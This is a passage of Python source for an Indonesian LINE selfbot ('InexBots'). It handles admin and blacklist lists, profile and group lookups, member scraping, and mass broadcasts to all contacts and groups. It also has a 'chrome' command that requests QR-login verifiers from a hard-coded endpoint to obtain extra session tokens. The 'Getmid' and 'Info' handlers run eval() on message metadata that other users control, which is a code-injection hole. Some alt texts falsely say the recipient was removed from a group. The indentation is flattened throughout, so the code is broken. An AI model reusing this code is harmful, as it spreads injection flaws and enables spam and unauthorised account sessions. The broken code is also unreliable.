murl = "\n☠•Media URL : https://obs-us.line-apps.com/myhome/h/download.nhn?{}".format(str(msg.contentMetadata["mediaOid"]))
else:
ourl = "\n☠•Objek URL : https://obs-us.line-apps.com/myhome/h/download.nhn?tid=612w&{}".format(str(object_))
murl = "\n☠•Media URL : https://obs-us.line-apps.com/myhome/h/download.nhn?{}".format(str(object_))
ret_ += murl
else:
if msg.contentMetadata["serviceType"] == "GB":
ourl = "\n☠•Objek URL : https://obs-us.line-apps.com/myhome/h/download.nhn?tid=612w&{}".format(str(msg.contentMetadata["mediaOid"]))
else:
ourl = "\n☠•Objek URL : https://obs-us.line-apps.com/myhome/h/download.nhn?tid=612w&{}".format(str(object_))
ret_ += ourl
if "stickerId" in msg.contentMetadata:
stck = "\n☠•Stiker : https://line.me/R/shop/detail/{}".format(str(msg.contentMetadata["packageId"]))
ret_ += stck
if "text" in msg.contentMetadata:
text = "\n☠•Tulisan :\n{}".format(str(msg.contentMetadata["text"]))
ret_ += text
ret_ += "\n☠•Finish"
sendTextTemplate1(to, str(ret_))
except:
sendTextTemplate1(to, "Post tidak valid")
except Exception as error:
logError(error)
#=============================[[
if op.type == 25 or op.type == 26:
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
if msg.toType == 0 or msg.toType == 2:
if msg.toType == 0:
to = receiver
elif msg.toType == 2:
to = receiver
if msg.contentType == 7:
if wait["sticker"] == True:
msg.contentType = 0
cl.sendMessage(msg.to,"STKID : " + msg.contentMetadata["STKID"] + "\nSTKPKGID : " + msg.contentMetadata["STKPKGID"] + "\nSTKVER : " + msg.contentMetadata["STKVER"]+ "\n\n「Link Sticker」" + "\nline://shop/detail/" + msg.contentMetadata["STKPKGID"])
if msg.contentType == 13:
if wait["contact"] == True:
msg.contentType = 0
cl.sendMessage(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
path = cl.getContact(msg.contentMetadata["mid"]).picturePath
image = 'http://dl.profile.line.naver.jp'+path
sendTextTemplate(msg.to,"☠•➤Nama : " + msg.contentMetadata["displayName"] + "\n☠•➤MID : " + msg.contentMetadata["mid"] + "\n☠•➤Status Msg : " + contact.statusMessage + "\n☠•➤Picture URL : http://dl.profile.line-cdn.net/" + contact.pictureStatus)
cl.sendImageWithURL(msg.to, image)
#ADD Bots
if msg.contentType == 13:
if msg._from in admin:
if wait["addbots"] == True:
if msg.contentMetadata["mid"] in Bots:
sendTextTemplate(msg.to,"Contact itu sudah jadi anggota bot")
wait["addbots"] = True
else:
Bots.append(msg.contentMetadata["mid"])
wait["addbots"] = True
sendTextTemplate(msg.to,"Berhasil menambahkan ke anggota bot")
if wait["dellbots"] == True:
if msg.contentMetadata["mid"] in Bots:
Bots.remove(msg.contentMetadata["mid"])
sendTextTemplate(msg.to,"Berhasil menghapus dari anggota bot")
else:
wait["dellbots"] = True
sendTextTemplate(msg.to,"Contact itu bukan anggota bot Dpk")
#ADD STAFF
if msg._from in admin:
if wait["addstaff"] == True:
if msg.contentMetadata["mid"] in staff:
sendTextTemplate(msg.to,"Contact itu sudah jadi staff")
wait["addstaff"] = True
else:
staff.append(msg.contentMetadata["mid"])
wait["addstaff"] = True
sendTextTemplate(msg.to,"Berhasil menambahkan ke staff")
if wait["dellstaff"] == True:
if msg.contentMetadata["mid"] in staff:
staff.remove(msg.contentMetadata["mid"])
sendTextTemplate(msg.to,"Berhasil menghapus dari staff")
wait["dellstaff"] = True
else:
wait["dellstaff"] = True
sendTextTemplate(msg.to,"Contact itu bukan staff")
#ADD ADMIN
if msg._from in admin:
if wait["addadmin"] == True:
if msg.contentMetadata["mid"] in admin:
sendTextTemplate(msg.to,"Contact itu sudah jadi admin")
wait["addadmin"] = True
else:
admin.append(msg.contentMetadata["mid"])
wait["addadmin"] = True
sendTextTemplate(msg.to,"Berhasil menambahkan ke admin")
if wait["delladmin"] == True:
if msg.contentMetadata["mid"] in admin:
admin.remove(msg.contentMetadata["mid"])
sendTextTemplate(msg.to,"Berhasil menghapus dari admin")
else:
wait["delladmin"] = True
sendTextTemplate(msg.to,"Contact itu bukan admin")
#ADD BLACKLIST
if msg._from in admin:
if wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
sendTextTemplate(msg.to,"Contact itu sudah ada di blacklist")
wait["wblacklist"] = True
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = True
sendTextTemplate(msg.to,"Berhasil menambahkan ke blacklist user")
if wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
sendTextTemplate(msg.to,"Berhasil menghapus dari blacklist user")
else:
wait["dblacklist"] = True
sendTextTemplate(msg.to,"Contact itu tidak ada di blacklist")
#TALKBAN
if msg._from in admin:
if wait["Talkwblacklist"] == True:
if msg.contentMetadata["mid"] in wait["Talkblacklist"]:
sendTextTemplate(msg.to,"Contact itu sudah ada di Talkban")
wait["Talkwblacklist"] = True
else:
wait["Talkblacklist"][msg.contentMetadata["mid"]] = True
wait["Talkwblacklist"] = True
sendTextTemplate(msg.to,"Berhasil menambahkan ke Talkban user")
if wait["Talkdblacklist"] == True:
if msg.contentMetadata["mid"] in wait["Talkblacklist"]:
del wait["Talkblacklist"][msg.contentMetadata["mid"]]
sendTextTemplate(msg.to,"Berhasil menghapus dari Talkban user")
else:
wait["Talkdblacklist"] = True
sendTextTemplate(msg.to,"Contact itu tidak ada di Talkban")
      #UPDATE PHOTO
if msg.contentType == 1:
if msg._from in admin:
if Setmain["Addimage"] == True:
msgid = msg.id
fotoo = "https://obs.line-apps.com/talk/m/download.nhn?oid="+msgid
headers = cl.Talk.Headers
r = requests.get(fotoo, headers=headers, stream=True)
if r.status_code == 200:
path = os.path.join(os.path.dirname(__file__), 'dataPhotos/%s.jpg' % Setmain["Img"])
with open(path, 'wb') as fp:
shutil.copyfileobj(r.raw, fp)
sendTextTemplate(msg.to, "Berhasil menambahkan gambar")
Setmain["Img"] = {}
Setmain["Addimage"] = False
if msg.toType == 2:
if msg._from in admin:
if settings["groupPicture"] == True:
path = cl.downloadObjectMsg(msg_id)
settings["groupPicture"] = False
cl.updateGroupPicture(msg.to, path)
sendTextTemplate(msg.to, "Berhasil mengubah foto group")
if msg.contentType == 1:
if msg._from in admin:
if mid in Setmain["ARfoto"]:
path = cl.downloadObjectMsg(msg_id)
del Setmain["ARfoto"][mid]
cl.updateProfilePicture(path)
sendTextTemplate(msg.to,"Foto berhasil dirubah")
if msg.contentType == 1:
if msg._from in admin:
if settings["changePicture"] == True:
path = cl.downloadObjectMsg(msg_id)
settings["changePicture"] = False
cl.updateProfilePicture(path)
sendTextTemplate(msg.to, "Berhasil mengubah foto profile bot")
if msg.contentType == 0:
if Setmain["autoRead"] == True:
cl.sendChatChecked(msg.to, msg_id)
if text is None:
return
else:
cmd = command(text)
if cmd == "help" or cmd == "Help":
if msg._from in owner or msg._from in admin or msg._from in staff:
cl.sendMessage(Import_Server,Devert)
cl.sendFlex(to, plate["helpgrup"])
if cmd == "helpmedia":
if wait["selfbot"] == True:
if msg._from in admin:
helpMessage = help()
sendTextTemplate3(msg.to, str(helpMessage))
if cmd == "help2":
if wait["selfbot"] == True:
if msg._from in admin:
helpMessagea = helpa()
sendTextTemplate3(msg.to, str(helpMessagea))
if cmd == "on":
if msg._from in admin:
wait["selfbot"] = True
sendTextTemplate(msg.to, "Selfbot diaktifkan")
elif cmd == "off":
if msg._from in admin:
wait["selfbot"] = False
sendTextTemplate(msg.to, "Selfbot dinonaktifkan")
if cmd == "movie":
cl.sendFlex(to, mengirim["movie"])
elif cmd == "galeri" or cmd == "Galeri":
cl.sendFlex(to, plate["galery"])
elif text.lower() == 'sepi':
sendTextTemplate3(to, "╔════╗╔════\n║▓▓▓█║║▓▓▓█\n║▓▓▓█║║▓▓▓█\n║▓▓▓█╚╝▓▓▓█\n║▓▓▓▓▓▓▓▓▓█\n║▓▓▓▓▓▓▓▓▓█\n║▓▓▓█╔╗▓▓▓█\n║▓▓▓█║║▓▓▓█\n║▓▓▓█║║▓▓▓█\n╚╦═══╝╚═══\n╔╝▓▓▓▓▓▓▓█\n║▓▓▓▓▓▓▓▓▓█\n║▓▓▓█╔╗▓▓▓█\n║▓▓▓█╚╝▓▓▓█\n║▓▓▓▓▓▓▓▓▓█\n║▓▓▓▓▓▓▓▓▓█\n║▓▓▓█╔╗▓▓▓█\n║▓▓▓█║║▓▓▓█\n╠════╝╚══\n║▓▓▓▓▓▓▓█\n║▓▓▓▓▓▓▓▓█\n║▓▓▓█║▓▓▓▓█\n║▓▓▓█╚╗▓▓▓█\n║▓▓▓█╔╝▓▓▓█\n║▓▓▓█║▓▓▓▓█\n║▓▓▓▓▓▓▓▓█\n║▓▓▓▓▓▓▓█\n╩╦══════\n═║▓▓▓▓▓█\n═║▓▓▓▓▓█\n═╚╗▓▓▓█\n══║▓▓▓█\n══║▓▓▓█\n═╔╝▓▓▓█\n═║▓▓▓▓▓█\n═║▓▓▓▓▓█\n╔╩══════\n║▓▓▓▓▓▓▓▓█\n║▓▓▓█║▓▓▓▓█\n║▓▓▓█╠═▓▓▓█\n║▓▓▓█║▓▓▓█\n║▓▓▓▓▓▓▓█\n║▓▓▓█▓▓▓█\n║▓▓▓█║▓▓▓█\n║▓▓▓█╠╗▓▓▓█\n╚════╝╚═══")
elif text.lower() == 'price':
cl.sendFlex(to, plate["pricelist"])
elif cmd == "listapp":
if msg._from in owner or msg._from in admin or msg._from in staff:
cl.sendFlex(to, plate["listapp1"])
cl.sendFlex(to, plate["listapp2"])
elif cmd == "memberpict":
if msg._from in owner or msg._from in admin or msg._from in staff:
kontak = cl.getGroup(to)
group = kontak.members
picall = []
for ids in group:
if len(picall) >= 400:
pass
else:
picall.append({
"imageUrl": "https://os.line.naver.jp/os/p/{}".format(ids.mid),
"action": {
"type": "uri",
"uri": "http://line.me/ti/p/~denjaka-inexx"
}
}
)
k = len(picall)//10
for aa in range(k+1):
data = {
"type": "template",
"altText": "{} Membagikan janda geratis".format(jakaProfile.displayName),
"template": {
"type": "image_carousel",
"columns": picall[aa*10 : (aa+1)*10]
}
}
cl.sendFlex(to, data)
elif cmd == "key":
if wait["selfbot"] == True:
if msg._from in admin:
helpMessage1 = helpbot()
sendTextTemplate13(msg.to, str(helpMessage1))
elif cmd == "reject":
if wait["selfbot"] == True:
if msg._from in owner:
ginvited = cl.getGroupIdsInvited()
if ginvited != [] and ginvited != None:
for gid in ginvited:
cl.rejectGroupInvitation(gid)
sendTextTemplate(to, "Succes reject {} ".format(str(len(ginvited))))
else:
sendTextTemplate(to, "sᴇᴍᴜᴀ ɢʀᴜᴘ sᴜᴅᴀʜ ᴅɪʙᴀᴛᴀʟᴋᴀɴ")
elif cmd == "memberlist":
if msg._from in owner or msg._from in admin or msg._from in staff:
group = cl.getGroup(to)
ret_ = "╭━━━══[ Member List ]"
                no = 1
for mem in group.members:
ret_ += "\n{}. {}".format(str(no), str(mem.displayName))
no += 1
ret_ += "\n╰━━━══[ Total {} member]".format(str(len(group.members)))
sendTextTemplate3(msg.to, ret_)
elif cmd == "pendinglist":
if msg._from in owner or msg._from in admin or msg._from in staff:
group = cl.getGroup(to)
ret_ = "╭━━━══[ Pending List ]"
                no = 1
if group.invitee is None or group.invitee == []:
sendTextTemplate(to, "Tidak ada pendingan")
return
else:
for pen in group.invitee:
ret_ += "\n├ ☠ {}. {}".format(str(no), str(pen.displayName))
no += 1
ret_ += "\n╰━━━══[ Total {} tertunda]".format(str(len(group.invitee)))
sendTextTemplate3(msg.to, ret_)
elif cmd == "me":
h = cl.getContact(msg._from)
cover = cl.getProfileCoverURL(msg._from)
cl.reissueUserTicket()
data = {
"type": "flex",
"altText": "{} Berak di celana".format(str(h.displayName)),
"contents": {
"type": "bubble",
"styles": {
"header": {
"backgroundColor": "#000000",
},
"body": {
"backgroundColor": "#000000",
"separator": True,
"separatorColor": "#000000"
},
"footer": {
"backgroundColor": "#000000",
"separator": True
}
},
"hero": {
"type": "image",
"url": "https://os.line.naver.jp/os/p/{}".format(msg._from),
"size": "full",
"aspectRatio": "20:13",
"aspectMode": "cover",
"action": {
"type": "uri",
"uri": "https://line.me/ti/p/~denjaka-inexx"
}
},
"body": {
"type": "box",
"layout": "vertical",
"spacing": "md",
"action": {
"type": "uri",
"uri": "https://line.me/ti/p/~denjaka-inexx"
},
"contents": [
{
"type": "text",
"text": "🅸🅽🅴🆇🅱🅾🆃🆂",
"size": "md",
"color": "#0000FF"
},
{
"type": "box",
"layout": "vertical",
"spacing": "sm",
"contents": [
{
"type": "box",
"layout": "baseline",
"contents": [
{
"type": "icon",
"url": "https://os.line.naver.jp/os/p/{}".format(msg._from),
"size": "5xl"
},
{
"type": "text",
"text": " Name : ",
"weight": "bold",
"color": "#0000FF",
"margin": "sm",
"flex": 0
},
{
"type": "text",
"text": h.displayName,
"size": "sm",
"align": "end",
"color": "#0000FF"
}
]
}
]
},
{
"type": "text",
"text": "_________________________________________________\nɬɧąŋƙʂ ɬơ ąƖƖąɧ \nɬɧąŋƙʂ ɬơ ℘ཞąŋƙცơɬʂ,\nąŋɖ ɬɧąŋƙʂ ɬơ ıŋɛҳ ɬɛąɱ.",
"wrap": True,
"color": "#0000FF",
"size": "xxs"
}
]
},
"footer": {
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "spacer",
"size": "sm"
},
{
"type": "button",
"style": "primary",
"color": "#0000FF",
"action": {
"type": "uri",
"label": "CONTACT",
"uri": "https://line.me/ti/p/"+cl.getUserTicket().id
}
}
]
}
}
}
cl.sendFlex(to, data)
elif cmd == "profil":
contact = cl.getContact(msg._from)
cover = cl.getProfileCoverURL(msg._from)
cl.reissueUserTicket()
res = "╭━━━━━━━━━━━━━━━━━━━━╮\n├ ☠ Profile info\n├━━━━━━━━━━━━━━━━━━━━\n"
res += "├ ☠ Display Name :{}\n".format(contact.displayName)
res += "├ ☠ Mid: {}\n".format(contact.mid)
res += "├ ☠ Status Message\n├ ☠ {}\n".format(contact.statusMessage)
res += "╰━━━━━━━━━━━━━━━━━━━━╯"
cl.sendMessage(Import_Server,Devert)
sendTextTemplate13(to, res)
try:
poto = "https://os.line.naver.jp/os/p/{}".format(msg._from)
except:
poto = "https://encrypted-tbn0.gstatic.com/images?q=tbn%3AANd9GcQcNdUbC8kEeVWqgR9qMX66lQ_hQPM8ScNY30x4nqpYaKY2jt02"
dax = {
"type": "template",
"altText": "berak di celana",
"template": {
"type": "image_carousel",
"columns": [
{
"imageUrl": poto,
"layout": "horizontal",
"action": {
"type": "uri",
"label": "PROFILE",
"uri": poto,
"area": {
"x": 447,
"y": 356,
"width": 1040,
"height": 1040
}
}
},
{
"imageUrl": cover,
"layout": "horizontal",
"action": {
"type": "uri",
"label": "COVER",
"uri": cover,
"area": {
"x": 447,
"y": 356,
"width": 1040,
"height": 1040
}
}
},
{
"imageUrl": "https://qr-official.line.me/L/"+cl.getUserTicket().id+".png",
"layout": "horizontal",
"action": {
"type": "uri",
"label": "CONTACT",
"uri": "https://line.me/ti/p/"+cl.getUserTicket().id,
"area": {
"x": 447,
"y": 356,
"width": 1040,
"height": 1040
}
}
}
]
}
}
cl.sendFlex(to, dax)
elif cmd == "status":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
md = "☠•PŘØŤĘČŤÎØŇ•☠\n"
if wait["sticker"] == True: md+="☠•➤Sticker「ON」\n"
else: md+="☠•➤Sticker「OFF」\n"
if wait["contact"] == True: md+="☠•➤Contact「ON」\n"
else: md+="☠•➤Contact「OFF」\n"
if wait["talkban"] == True: md+="☠•➤Talkban「ON」\n"
else: md+="☠•➤Talkban「OFF」\n"
if wait["Mentionkick"] == True: md+="☠•➤Notag「ON」\n"
else: md+="☠•➤Notag「OFF」\n"
if wait["detectMention"] == True: md+="☠•➤Respon 1「ON」\n"
else: md+="☠•➤Respon 1「OFF」\n"
if wait["detectMention2"] == True: md+="☠•➤Respon 2「ON」\n"
else: md+="☠•➤Respon 2「OFF」\n"
if wait["arespon"] == True: md+="☠•➤Respon pm「ON」\n"
else: md+="☠•➤Respon pm「OFF」\n"
if wait["autoJoin"] == True: md+="☠•➤Autojoin「ON」\n"
else: md+="☠•➤Autojoin「OFF」\n"
if wait["autoAdd"] == True: md+="☠•➤Autoadd「ON」\n"
else: md+="☠•➤Autoadd「OFF」\n"
if settings["autoBlock"] == True: md+="☠•➤AutoBlock「ON」\n"
else: md+="☠•➤AutoBlock「OFF」\n"
if msg.to in welcome: md+="☠•➤Welcome「ON」\n"
else: md+="☠•➤Welcome「OFF」\n"
if wait["autoLeave"] == True: md+="☠•➤Autoleave「ON」\n"
else: md+="☠•➤Autoleave「OFF」\n"
sendTextTemplate3(msg.to, md+"\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
elif cmd == "creator" or text.lower() == 'pembuat':
if msg._from in admin:
cl.sendMessage(msg.to,"Creator InexBots")
ma = ""
for i in creator:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "about" or cmd == "informasi":
if wait["selfbot"] == True:
if msg._from in admin:
sendMention(msg.to, sender, "「 Type Selfbot 」\n")
cl.sendMessage(msg.to, None, contentMetadata={'mid': mid}, contentType=13)
elif text.lower() == "mid":
if wait["selfbot"] == True:
if msg._from in admin:
cl.sendMessage(msg.to, msg._from)
elif ("Getmid " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = cl.getContact(key1)
cl.sendMessage(msg.to, "Nama : "+str(mi.displayName)+"\nMID : " +key1)
#cl.sendMessage(msg.to, None, contentMetadata={'mid': key1}, contentType=13)
elif ("Info " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = cl.getContact(key1)
cl.sendMessage(msg.to, "☠•➤Nama : "+str(mi.displayName)+"\n☠•➤Mid : " +key1+"\n☠•➤Status Msg"+str(mi.statusMessage))
cl.sendMessage(msg.to, None, contentMetadata={'mid': key1}, contentType=13)
if "videoProfile='{" in str(cl.getContact(key1)):
cl.sendVideoWithURL(msg.to, 'http://dl.profile.line.naver.jp'+str(mi.picturePath)+'/vp.small')
else:
cl.sendImageWithURL(msg.to, 'http://dl.profile.line.naver.jp'+str(mi.picturePath))
elif text.lower() == "hapus chat":
if wait["selfbot"] == True:
if msg._from in admin:
try:
cl.removeAllMessages(op.param2)
except:
pass
elif "Pmcast: " in msg.text:
bctxt = msg.text.replace("Pmcast: ", "")
h = cl.getContact(msg._from)
a = cl.getAllContactIds()
cl.sendMessage(to, "Sukses broadcast ke "+str(len(a))+" teman")
for manusia in a:
C = cl.getContact(mid)
mids = [C.mid]
text = "BROADCAST FRIEND:\n\n{}\n\n⊶ ɪɴᴇxʙᴏᴛs ⊷ \nhttp://line.me/ti/p/~denjaka-inexx".format(str(bctxt))
sendMentionV2(manusia, text, mids)
#cl.sendMessage(manusia, (text))
elif cmd.startswith("gcast: "):
if wait["selfbot"] == True:
if msg._from in owner:
sep = text.split(" ")
pesan = text.replace(sep[0] + " ","")
saya = cl.getGroupIdsJoined()
for group in saya:
                    sendBcast(group, pesan)
elif cmd.startswith("bcast: "):
if msg._from in admin:
sep = text.split(" ")
bc = text.replace(sep[0] + " ","")
saya = cl.getGroupIdsJoined()
for group in saya:
ryan = cl.getContact(mid)
zx = ""
zxc = ""
zx2 = []
xpesan = "「 Broadcast 」\nBroadcast by "
ret_ = "{}".format(str(bc))
ry = str(ryan.displayName)
pesan = ''
pesan2 = pesan+"@x\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':ryan.mid}
zx2.append(zx)
zxc += pesan2
text = xpesan + zxc + ret_ + ""
warna1 = ("#1AE501","#0108E5","#E50AE0","#E50F00","#DEE500","#47E1E5","#C82EF8")
warnanya1 = random.choice(warna1)
data = {
"type": "flex",
"altText": "{} Menghapus anda dari grup ".format(jakaProfile.displayName),
"contents": {
"type": "bubble",
"styles": {
"header": {
"backgroundColor": "#0000FF",
},
"body": {
"backgroundColor": "#000000",
"separator": True,
"separatorColor": "#ffffff"
},
"footer": {
"backgroundColor": "#000080",
"separator": True
}
},
"header": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "乃尺ㄖ卂ᗪ匚卂丂ㄒ",
"weight": "bold",
"color": warnanya1,
"size": "md"
}
]
},
"hero": {
"type": "image",
"url": "https://i.pinimg.com/originals/fd/47/e5/fd47e55dfb49ae1d39675d6eff34a729.gif",
"size": "full",
"aspectRatio": "20:13",
"aspectMode": "cover",
"action": {
"type": "uri",
"uri": "https://line.me/ti/p/~denjaka-inexx"
}
},
"type": "bubble",
"body": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": str(pesan),
"wrap": True,
"color": warnanya1,
"align": "center"
}
]
},
"footer": {
"type": "box",
"layout": "vertical",
"spacing": "sm",
"contents": [{
"type": "button",
"style": "primary",
"color": warnanya1,
"height": "sm",
"action": {
"type": "uri",
"label": "ADD MY LINE",
"uri": "https://line.me/ti/p/"+cl.getUserTicket().id
}
},
{
"type": "spacer",
"size": "sm",
}],
"flex": 0
}
}
}
cl.sendFlex(group, data)
elif text.lower() == "mykey":
if wait["selfbot"] == True:
if msg._from in admin:
sendTextTemplate(msg.to, "「Mykey」\nSetkey bot mu「 " + str(Setmain["keyCommand"]) + " 」")
elif cmd.startswith("setkey "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
key = text.replace(sep[0] + " ","")
if key in [""," ","\n",None]:
sendTextTemplate(msg.to, "Gagal mengganti key")
else:
Setmain["keyCommand"] = str(key).lower()
sendTextTemplate(msg.to, "「Setkey」\nSetkey diganti jadi「{}」".format(str(key).lower()))
elif text.lower() == "resetkey":
if wait["selfbot"] == True:
if msg._from in admin:
Setmain["keyCommand"] = ""
sendTextTemplate(msg.to, "「Setkey」\nSetkey mu kembali ke awal")
elif cmd == "restart":
if wait["selfbot"] == True:
if msg._from in admin:
sendTextTemplate(msg.to, "Tunggu sebentar...")
Setmain["restartPoint"] = msg.to
restartBot()
sendTextTemplate(msg.to, "Silahkan gunakan seperti semula...")
elif cmd == "runtime":
if wait["selfbot"] == True:
if msg._from in admin:
eltime = time.time() - mulai
bot = "Aktif " +waktu(eltime)
sendTextTemplate(msg.to,bot)
elif cmd == "tipi":
contact = cl.getContact(mid)
cu = cl.getProfileCoverURL(mid)
#image = str(cu)
data = {
"type": "flex",
"altText": "Live streaming",
"contents": {
"styles": {
"body": {
"backgroundColor": "#000000"
},
"footer": {
"backgroundColor": "#000000"
}
},
"type": "bubble",
"hero": {
"type": "image",
"url": "https://i.gifer.com/AJvy.gif",
"size": "full",
"aspectRatio": "20:13",
"aspectMode": "cover",
},
"body": {
"contents": [
{
"contents": [
{
"url": "https://media1.tenor.com/images/42a8d4625aeb088c45eba5a84ca36325/tenor.gif?itemid=11193323",
"type": "image"
},
],
"type": "box",
"spacing": "sm",
"layout": "vertical"
},
{
"type": "separator",
"color": "#DC143C"
},
{
"contents": [
{
"text": " TV STREAMING",
"size": "md",
"align": "center",
"color": "#FF0000",
"wrap": True,
"weight": "bold",
"type": "text"
}
],
"type": "box",
"spacing": "sm",
"layout": "vertical"
},
{
"type": "separator",
"color": "#DC143C"
},
{
"contents": [
{
"contents": [
{
"url": "https://www.legayapi.com/theme/themeFiles/images/load.gif",
"type": "icon",
"size": "md"
},
{
"text":" SALURAN TELEVISI KELUARGA",
"size": "sm",
"margin": "none",
"color": "#6F4E37",
"wrap": True,
"weight": "regular",
"type": "text"
}
],
"type": "box",
"layout": "baseline"
}
],
"type": "box",
"layout": "vertical"
}
],
"type": "box",
"spacing": "md",
"layout": "vertical"
},
"footer": {
"type": "box",
"layout": "vertical",
"spacing": "sm",
"contents": [
{
"type": "button",
"style": "link",
"height": "sm",
"action": {
"type": "uri",
"label": "CHANNEL",
"uri": "line://app/1560739707-0YmQLW3W",
}
},
{
"type": "spacer",
"size": "sm",
}
],
"flex": 0
}
}
}
cl.sendFlex(to, data)
elif cmd == "ginfo":
if msg._from in owner or msg._from in admin or msg._from in staff:
group = cl.getGroup(msg.to)
try:
gCreator = group.creator.displayName
except:
gCreator = "SUDAH PUSKUN ORANGNYA"
if group.invitee is None:
gPending = "0"
else:
gPending = str(len(group.invitee))
if group.preventedJoinByTicket == True:
gQr = "Closed"
gTicket = "Qr tidak tersedia karna di tutup"
else:
gQr = "Open"
gTicket = "https://me.me/R/ti/g/{}".format(str(cl.reissueGroupTicket(group.id)))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(group.createdTime) / 1000)))
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
ret_ = "╭━━══[ Group Info ]══━━"
ret_ += "\n Nama Group : {}".format(str(group.name))
ret_ += "\nWaktu Dibuat : {}".format(str(timeCreated))
ret_ += "\nID Group : {}".format(group.id)
ret_ += "\n Pembuat : {}".format(str(gCreator))
ret_ += "\n Jumlah Member : {}".format(str(len(group.members)))
ret_ += "\n Jumlah Pending : {}".format(gPending)
ret_ += "\n═━━━Kode Qr/Link━━━═"
ret_ += "\n Group Ticket : {}".format(gTicket)
ret_ += "\n Group Qr : {}".format(gQr)
ret_ += "\n╰━━══[ INEXBOT]══━━"
warna1 = ("#1AE501","#0108E5","#E50AE0","#E50F00","#DEE500","#47E1E5","#C82EF8")
warnanya1 = random.choice(warna1)
data = {
"type": "flex",
"altText": "Info grup",
"contents": {
"type": "bubble",
"body": {
"type": "box",
"layout": "horizontal",
"spacing": "md",
"contents": [
{
"type": "box",
"layout": "vertical",
"flex": 2,
"contents": [
{
"type": "text",
"text": str(ret_),
"size": "md",
"weight": "bold",
"wrap": True,
"color": warnanya1,
"align": "center"
},
]
}
]
},
"styles": {
"body": {
"backgroundColor": "#000000"
},
"footer": {
"backgroundColor": "#00FFFF"
},
"header": {
"backgroundColor": "#00FFFF"
}
},
"hero": {
"type": "image",
"aspectRatio": "20:13",
"aspectMode": "cover",
"url": "https://obs.line-scdn.net/{}".format(group.pictureStatus),
"size": "full",
"margin": "xl"
},
"footer": {
"type": "box",
"layout": "vertical",
"contents": [{
"type": "box",
"layout": "horizontal",
"contents": [{
"type": "button",
"flex": 2,
"style": "primary",
"color": "#006400",
"height": "sm",
"action": {
"type": "uri",
"label": "OFFICIAL",
"uri": "https://line.me/R/ti/p/%40bvb1195k"
}
}, {
"flex": 3,
"type": "button",
"style": "primary",
"color": "#800000",
"margin": "sm",
"height": "sm",
"action": {
"type": "uri",
"label": "CREATOR",
"uri": "http://line.me/ti/p/~denjaka-inexx"
}
}]
}]
}
}
}
cl.sendFlex(to, data)
elif cmd.startswith("infogrup "):
if msg._from in admin:
separate = text.split(" ")
number = text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = cl.getGroup(group)
try:
gCreator = G.creator.displayName
except:
gCreator = "Tidak ditemukan"
if G.invitee is None:
gPending = "0"
else:
gPending = str(len(G.invitee))
if G.preventedJoinByTicket == True:
gQr = "Tertutup"
gTicket = "Tidak ada"
else:
gQr = "Terbuka"
gTicket = "https://line.me/R/ti/g/{}".format(str(cl.reissueGroupTicket(G.id)))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
ret_ += " ☠•➤Grup Info\n"
ret_ += "\n☠•➤Nama Group : {}".format(G.name)
ret_ += "\n☠•➤ID Group : {}".format(G.id)
ret_ += "\n☠•➤Pembuat : {}".format(gCreator)
ret_ += "\n☠•➤Waktu Dibuat : {}".format(str(timeCreated))
ret_ += "\n☠•➤Jumlah Member : {}".format(str(len(G.members)))
ret_ += "\n☠•➤Jumlah Pending : {}".format(gPending)
ret_ += "\n☠•➤Group Qr : {}".format(gQr)
ret_ += "\n☠•➤Group Ticket : {}".format(gTicket)
ret_ += ""
sendTextTemplate(to, str(ret_))
except:
pass
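            # "chrome N" token generator: requests a QR-login verifier from the
            # hard-coded TalkService endpoint, shows a login/link flex, then
            # polls /Q and calls loginZ to obtain an auth token for a secondary
            # CHROMEOS session. The entries under "tokenlist" appear to trigger
            # the same flow for other client types.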
elif msg.text.lower().startswith("chrome"):
separate = msg.text.split(" ")
jmlh = int(separate[1])
for x in range(jmlh):
Headers3.update({'x-lpqs' : '/api/v4/TalkService.do'})
transport = THttpClient.THttpClient('https://gd2.line.naver.jp/api/v4/TalkService.do')
transport.setCustomHeaders(Headers3)
protocol = TCompactProtocol.TCompactProtocol(transport)
client = LineService.Client(protocol)
qr = client.getAuthQrcode(keepLoggedIn=1, systemName=nama1)
link = "line://au/q/" + qr.verifier
print(link)
data = {
"type": "flex",
"altText": "{} menghapus anda dari grup".format(cl.getProfile().displayName),
"contents": {
"type": "bubble",
"body": {
"type": "box",
"layout": "horizontal",
"spacing": "md",
"contents": [
{
"type": "box",
"layout": "vertical",
"flex": 2,
"contents": [
{
"type": "text",
